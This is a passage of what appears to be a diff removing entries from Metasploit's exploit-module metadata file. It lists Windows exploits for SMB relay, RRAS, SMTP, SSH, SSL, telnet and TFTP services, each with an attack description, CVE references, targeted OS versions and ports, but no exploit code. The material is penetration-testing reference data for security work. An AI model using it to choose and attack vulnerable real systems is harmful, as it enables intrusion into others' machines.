The service and payload\n file listed in the output will need to be manually removed after access\n has been gained. The service created by this tool uses a randomly chosen\n name and description, so the services list can become cluttered after\n repeated exploitation.\n\n The SMB authentication relay attack was first reported by Sir Dystic on\n March 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n includes a patch which prevents the relaying of challenge keys back to\n the host which issued them, preventing this exploit from working in\n the default configuration. It is still possible to set the SMBHOST\n parameter to a third-party host that the victim is authorized to access,\n but the \"reflection\" attack has been effectively broken.\n\n As of Feb 2022 - this module does not support SMB 1.", - "references": [ - "CVE-2008-4037", - "OSVDB-49736", - "MSB-MS08-068", - "URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx", - "URL-https://en.wikipedia.org/wiki/SMBRelay", - "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "PowerShell", - "Native upload", - "MOF upload", - "Command" - ], - "mod_time": "2024-11-12 09:14:51 +0000", - "path": "/modules/exploits/windows/smb/smb_relay.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_relay", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "account-lockouts" - ] - }, - "session_types": false, - "needs_cleanup": null, - "actions": [ - { - "name": "CREATE_SMB_SESSION", - "description": "Do not close the SMB 
connection after relaying, and instead create an SMB session" - }, - { - "name": "PSEXEC", - "description": "Use the SMB Connection to run the exploit/windows/psexec module against the relay target" - } - ] - }, - "exploit_windows/smb/smb_rras_erraticgopher": { - "name": "Microsoft Windows RRAS Service MIBEntryGet Overflow", - "fullname": "exploit/windows/smb/smb_rras_erraticgopher", - "aliases": [], - "rank": 200, - "disclosure_date": "2017-06-13", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "Víctor Portal", - "bcoles " - ], - "description": "This module exploits an overflow in the Windows Routing and Remote\n Access Service (RRAS) to execute code as SYSTEM.\n\n The RRAS DCERPC endpoint is accessible to unauthenticated users via\n SMBv1 browser named pipe on Windows Server 2003 and Windows XP hosts;\n however, this module targets Windows Server 2003 only.\n\n Since the service is hosted inside svchost.exe, a failed exploit\n attempt can cause other system services to fail as well.\n\n The module has been successfully tested on:\n\n Windows Server 2003 SP0 (x86);\n Windows Server 2003 SP1 (x86);\n Windows Server 2003 SP2 (x86); and\n Windows Server 2003 R2 SP2 (x86).", - "references": [ - "CVE-2017-8461", - "CWE-119", - "BID-99012", - "EDB-41929", - "PACKETSTORM-147593", - "URL-https://www.securitytracker.com/id/1038701", - "URL-https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/master/windows/exploits/Erraticgopher-1.0.1.0.xml", - "URL-https://support.microsoft.com/en-us/topic/microsoft-security-advisory-4025685-guidance-for-older-platforms-june-13-2017-05151e8a-bd7f-f769-43df-38d2c24f96cd", - "URL-https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa374540(v=vs.85)", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/ebc5c709-36d8-4520-a0ac-6f36d2d6c0b2", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/5dca234b-bea4-4e67-958e-5459a32a7b71", - 
"URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/4305d67f-9273-49fe-a067-909b6ae8a341", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/3ca0723e-36ea-448a-a97e-1906dd3d07a6", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/dda988f0-4cce-4ffe-b8c9-d5199deafba5", - "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/169e435d-a975-4c1c-bf41-55fd2bd76125" - ], - "platform": "Windows", - "arch": "x86", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "Windows Server 2003 SP0 (English)", - "Windows Server 2003 SP1 (English) (NX)", - "Windows Server 2003 SP2 (English) (NX)", - "Windows Server 2003 R2 SP2 (English) (NX)" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/smb/smb_rras_erraticgopher.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_rras_erraticgopher", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ErraticGopher" - ], - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/smb_shadow": { - "name": "Microsoft Windows SMB Direct Session Takeover", - "fullname": "exploit/windows/smb/smb_shadow", - "aliases": [], - "rank": 0, - "disclosure_date": "2021-02-16", - "type": "exploit", - "author": [ - "usiegl00" - ], - "description": "This module will intercept direct SMB authentication requests to\n another host, gaining access to an authenticated SMB session if\n successful. If the connecting user is an administrator and network\n logins are allowed to the target machine, this module will execute an\n arbitrary payload. 
To exploit this, the target system must try to\n autheticate to another host on the local area network.\n\n SMB Direct Session takeover is a combination of previous attacks.\n\n This module is dependent on an external ARP spoofer. The builtin ARP\n spoofer was not providing sufficient host discovery. Bettercap v1.6.2\n was used during the development of this module.\n\n The original SMB relay attack was first reported by Sir Dystic on March\n 31st, 2001 at @lanta.con in Atlanta, Georgia.", - "references": [ - "URL-https://strontium.io/blog/introducing-windows-10-smb-shadow-attack" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-04-06 07:12:46 +0000", - "path": "/modules/exploits/windows/smb/smb_shadow.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_shadow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/timbuktu_plughntcommand_bof": { - "name": "Timbuktu PlughNTCommand Named Pipe Buffer Overflow", - "fullname": "exploit/windows/smb/timbuktu_plughntcommand_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-06-25", - "type": "exploit", - "author": [ - "bannedit " - ], - "description": "This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n in a pretty novel way.\n\n This exploit requires two connections. The first connection is used to leak stack data\n using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n a large value for this argument it is possible to cause Timbuktu to reply to the initial\n request with leaked stack data. 
Using this data allows for reliable exploitation of the\n buffer overflow vulnerability.\n\n Props to Infamous41d for helping in finding this exploitation path.\n\n The second connection utilizes the data from the data leak to accurately exploit\n the stack based buffer overflow vulnerability.\n\n TODO:\n hdm suggested using meterpreter's migration capability and restarting the process\n for multishot exploitation.", - "references": [ - "CVE-2009-1394", - "OSVDB-55436", - "BID-35496", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targeting" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb", - "is_install_path": true, - "ref_name": "windows/smb/timbuktu_plughntcommand_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/webexec": { - "name": "WebExec Authenticated User Code Execution", - "fullname": "exploit/windows/smb/webexec", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-24", - "type": "exploit", - "author": [ - "Ron " - ], - "description": "This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. 
This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.", - "references": [ - "URL-https://webexec.org", - "CVE-2018-15442" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "Native upload" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/webexec.rb", - "is_install_path": true, - "ref_name": "windows/smb/webexec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/mailcarrier_smtp_ehlo": { - "name": "TABS MailCarrier v2.51 SMTP EHLO Overflow", - "fullname": "exploit/windows/smtp/mailcarrier_smtp_ehlo", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-10-26", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.", - "references": [ - "CVE-2004-1638", - "OSVDB-11174", - "BID-11535", - "EDB-598" - ], - "platform": "Windows", - "arch": "x86", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP0 - XP SP1 - EN/FR/GR", - "Windows XP SP2 - EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb", - "is_install_path": true, - "ref_name": "windows/smtp/mailcarrier_smtp_ehlo", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/mercury_cram_md5": { - "name": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", - "fullname": "exploit/windows/smtp/mercury_cram_md5", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-08-18", - "type": "exploit", - 
"author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n may be able to execute arbitrary code.", - "references": [ - "CVE-2007-4440", - "OSVDB-39669", - "BID-25357" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Mercury Mail Transport System 4.51" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/mercury_cram_md5.rb", - "is_install_path": true, - "ref_name": "windows/smtp/mercury_cram_md5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/ms03_046_exchange2000_xexch50": { - "name": "MS03-046 Exchange 2000 XEXCH50 Heap Overflow", - "fullname": "exploit/windows/smtp/ms03_046_exchange2000_xexch50", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-10-15", - "type": "exploit", - "author": [ - "hdm ", - "aushack " - ], - "description": "This is an exploit for the Exchange 2000 heap overflow. Due\n to the nature of the vulnerability, this exploit is not very\n reliable. This module has been tested against Exchange 2000\n SP0 and SP3 running a Windows 2000 system patched to SP4. It\n normally takes between one and 100 connection attempts to\n successfully obtain a shell. 
This exploit is *very* unreliable.", - "references": [ - "CVE-2003-0714", - "BID-8838", - "OSVDB-2674", - "MSB-MS03-046", - "EDB-113" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Exchange 2000" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb", - "is_install_path": true, - "ref_name": "windows/smtp/ms03_046_exchange2000_xexch50", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/njstar_smtp_bof": { - "name": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow", - "fullname": "exploit/windows/smtp/njstar_smtp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-10-31", - "type": "exploit", - "author": [ - "Dillon Beresford" - ], - "description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. 
According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.", - "references": [ - "OSVDB-76728", - "CVE-2011-4040", - "URL-http://www.njstar.com/cms/njstar-communicator", - "EDB-18057" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3", - "Windows Server 2003 SP0", - "Windows Server 2003 SP1/SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/njstar_smtp_bof.rb", - "is_install_path": true, - "ref_name": "windows/smtp/njstar_smtp_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/sysgauge_client_bof": { - "name": "SysGauge SMTP Validation Buffer Overflow", - "fullname": "exploit/windows/smtp/sysgauge_client_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-02-28", - "type": "exploit", - "author": [ - "Chris Higgins", - "Peter Baris" - ], - "description": "This module will setup an SMTP server expecting a connection from SysGauge 1.5.18\n via its SMTP server validation. 
The module sends a malicious response along in the\n 220 service ready response and exploits the client, resulting in an unprivileged shell.", - "references": [ - "CVE-2017-6416", - "EDB-41479" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2018-07-12 17:34:52 +0000", - "path": "/modules/exploits/windows/smtp/sysgauge_client_bof.rb", - "is_install_path": true, - "ref_name": "windows/smtp/sysgauge_client_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/wmailserver": { - "name": "SoftiaCom WMailserver 1.0 Buffer Overflow", - "fullname": "exploit/windows/smtp/wmailserver", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-07-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.", - "references": [ - "CVE-2005-2287", - "OSVDB-17883", - "BID-14213" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/wmailserver.rb", - "is_install_path": true, - "ref_name": "windows/smtp/wmailserver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smtp/ypops_overflow1": { - "name": "YPOPS 0.6 Buffer Overflow", - "fullname": "exploit/windows/smtp/ypops_overflow1", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-09-27", - "type": "exploit", - "author": [ - "acaro " - ], - "description": "This module exploits a stack buffer overflow in the YPOPS POP3\n 
service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll", - "references": [ - "CVE-2004-1558", - "OSVDB-10367", - "BID-11256", - "URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic", - "Windows 2000 SP0 Italian", - "Windows 2000 Advanced Server Italian SP4", - "Windows 2000 Advanced Server SP3 English", - "Windows 2000 SP0 English", - "Windows 2000 SP1 English", - "Windows 2000 SP2 English", - "Windows 2000 SP3 English", - "Windows 2000 SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows 2003 SP0 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smtp/ypops_overflow1.rb", - "is_install_path": true, - "ref_name": "windows/smtp/ypops_overflow1", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/freeftpd_key_exchange": { - "name": "FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow", - "fullname": "exploit/windows/ssh/freeftpd_key_exchange", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-05-12", - "type": "exploit", - "author": [ - "riaf " - ], - "description": "This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.\n This module is based on MC's freesshd_key_exchange exploit.", - "references": [ - "CVE-2006-2407", - "OSVDB-25569", - "BID-17958" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - 
"autofilter_services": [], - "targets": [ - "Windows 2000 SP0-SP4 English", - "Windows 2000 SP0-SP4 German", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/freeftpd_key_exchange.rb", - "is_install_path": true, - "ref_name": "windows/ssh/freeftpd_key_exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/freesshd_authbypass": { - "name": "Freesshd Authentication Bypass", - "fullname": "exploit/windows/ssh/freesshd_authbypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-08-11", - "type": "exploit", - "author": [ - "Aris", - "kcope", - "Daniele Martini ", - "Imran E. Dawoodjee (minor improvements)>" - ], - "description": "This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass\n authentication. You just need the username (which defaults to root). 
The exploit\n has been tested with both password and public key authentication.", - "references": [ - "CVE-2012-6066", - "OSVDB-88006", - "BID-56785", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html", - "URL-https://seclists.org/fulldisclosure/2010/Aug/132" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "PowerShell", - "CmdStager upload" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/ssh/freesshd_authbypass.rb", - "is_install_path": true, - "ref_name": "windows/ssh/freesshd_authbypass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/freesshd_key_exchange": { - "name": "FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow", - "fullname": "exploit/windows/ssh/freesshd_key_exchange", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-05-12", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.", - "references": [ - "CVE-2006-2407", - "OSVDB-25463", - "BID-17958" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/freesshd_key_exchange.rb", - "is_install_path": true, - "ref_name": "windows/ssh/freesshd_key_exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/putty_msg_debug": { - "name": 
"PuTTY Buffer Overflow", - "fullname": "exploit/windows/ssh/putty_msg_debug", - "aliases": [], - "rank": 300, - "disclosure_date": "2002-12-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the PuTTY SSH client that is\n triggered through a validation error in SSH.c. This vulnerability\n affects versions 0.53 and earlier.", - "references": [ - "CVE-2002-1359", - "OSVDB-8044", - "URL-http://www.rapid7.com/advisories/R7-0009.html", - "BID-6407" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/putty_msg_debug.rb", - "is_install_path": true, - "ref_name": "windows/ssh/putty_msg_debug", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/securecrt_ssh1": { - "name": "SecureCRT SSH1 Buffer Overflow", - "fullname": "exploit/windows/ssh/securecrt_ssh1", - "aliases": [], - "rank": 200, - "disclosure_date": "2002-07-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in SecureCRT <= 4.0\n Beta 2. 
By sending a vulnerable client an overly long\n SSH1 protocol identifier string, it is possible to execute\n arbitrary code.\n\n This module has only been tested on SecureCRT 3.4.4.", - "references": [ - "CVE-2002-1059", - "OSVDB-4991", - "BID-5287" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SecureCRT.exe (3.4.4)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssh/securecrt_ssh1.rb", - "is_install_path": true, - "ref_name": "windows/ssh/securecrt_ssh1", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssh/sysax_ssh_username": { - "name": "Sysax 5.53 SSH Username Buffer Overflow", - "fullname": "exploit/windows/ssh/sysax_ssh_username", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-27", - "type": "exploit", - "author": [ - "Craig Freyman", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. 
Please note that previous versions\n (before 5.53) are also affected by this bug.", - "references": [ - "OSVDB-79689", - "URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html", - "EDB-18535" - ], - "platform": "Windows", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sysax 5.53 on Win XP SP3 / Win2k3 SP0", - "Sysax 5.53 on Win2K3 SP1/SP2" - ], - "mod_time": "2022-04-18 09:36:52 +0000", - "path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb", - "is_install_path": true, - "ref_name": "windows/ssh/sysax_ssh_username", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ssl/ms04_011_pct": { - "name": "MS04-011 Microsoft Private Communications Transport Overflow", - "fullname": "exploit/windows/ssl/ms04_011_pct", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-04-13", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a buffer overflow in the Microsoft\n Windows SSL PCT protocol stack. This code is based on Johnny\n Cyberpunk's THC release and has been tested against Windows\n 2000 and Windows XP. To use this module, specify the remote\n port of any SSL service, or the port and protocol of an\n application that uses SSL. The only application protocol\n supported at this time is SMTP. You only have one chance to\n select the correct target, if you are attacking IIS, you may\n want to try one of the other exploits first (WebDAV). If\n WebDAV does not work, this more than likely means that this\n is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n 5.1). 
Using the wrong target may not result in an immediate\n crash of the remote system.", - "references": [ - "CVE-2003-0719", - "OSVDB-5250", - "BID-10116", - "MSB-MS04-011" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4", - "Windows 2000 SP3", - "Windows 2000 SP2", - "Windows 2000 SP1", - "Windows 2000 SP0", - "Windows XP SP0", - "Windows XP SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ssl/ms04_011_pct.rb", - "is_install_path": true, - "ref_name": "windows/ssl/ms04_011_pct", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/telnet/gamsoft_telsrv_username": { - "name": "GAMSoft TelSrv 1.5 Username Buffer Overflow", - "fullname": "exploit/windows/telnet/gamsoft_telsrv_username", - "aliases": [], - "rank": 200, - "disclosure_date": "2000-07-17", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n Other versions may also be affected. 
The service terminates after exploitation,\n so you only get one chance!", - "references": [ - "CVE-2000-0665", - "OSVDB-373", - "BID-1478", - "URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip" - ], - "platform": "Windows", - "arch": "x86", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP0/4 English REMOTE", - "Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)", - "Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb", - "is_install_path": true, - "ref_name": "windows/telnet/gamsoft_telsrv_username", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/telnet/goodtech_telnet": { - "name": "GoodTech Telnet Server Buffer Overflow", - "fullname": "exploit/windows/telnet/goodtech_telnet", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-03-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. 
By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.", - "references": [ - "CVE-2005-0768", - "OSVDB-14806", - "BID-12815" - ], - "platform": "Windows", - "arch": "", - "rport": 2380, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb", - "is_install_path": true, - "ref_name": "windows/telnet/goodtech_telnet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/attftp_long_filename": { - "name": "Allied Telesyn TFTP Server 1.9 Long Filename Overflow", - "fullname": "exploit/windows/tftp/attftp_long_filename", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-11-27", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n request (get/write) for an overly long file name.", - "references": [ - "CVE-2006-6184", - "OSVDB-11350", - "BID-21320", - "EDB-2887" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows NT SP4 English", - "Windows 2000 SP0 English", - "Windows 2000 SP1 English", - "Windows 2000 SP2 English", - "Windows 2000 SP3 English", - "Windows 2000 SP4 English", - "Windows XP SP0/1 English", - "Windows XP SP2 English", - "Windows XP SP3 English", - "Windows Server 2003", - "Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/attftp_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/attftp_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": null - }, - "exploit_windows/tftp/distinct_tftp_traversal": { - "name": "Distinct TFTP 3.10 Writable Directory Traversal Execution", - "fullname": "exploit/windows/tftp/distinct_tftp_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-04-08", - "type": "exploit", - "author": [ - "modpr0be", - "sinn3r " - ], - "description": "This module exploits a directory traversal vulnerability in the TFTP\n Server component of Distinct Intranet Servers version 3.10 which\n allows a remote attacker to write arbitrary files to the server file\n system, resulting in code execution under the context of 'SYSTEM'.\n This module has been tested successfully on TFTP Server version 3.10\n on Windows XP SP3 (EN).", - "references": [ - "OSVDB-80984", - "EDB-18718", - "URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf", - "CVE-2012-6664" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb", - "is_install_path": true, - "ref_name": "windows/tftp/distinct_tftp_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/tftp/dlink_long_filename": { - "name": "D-Link TFTP 1.0 Long Filename Buffer Overflow", - "fullname": "exploit/windows/tftp/dlink_long_filename", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-03-12", - "type": "exploit", - "author": [ - "LSO ", - 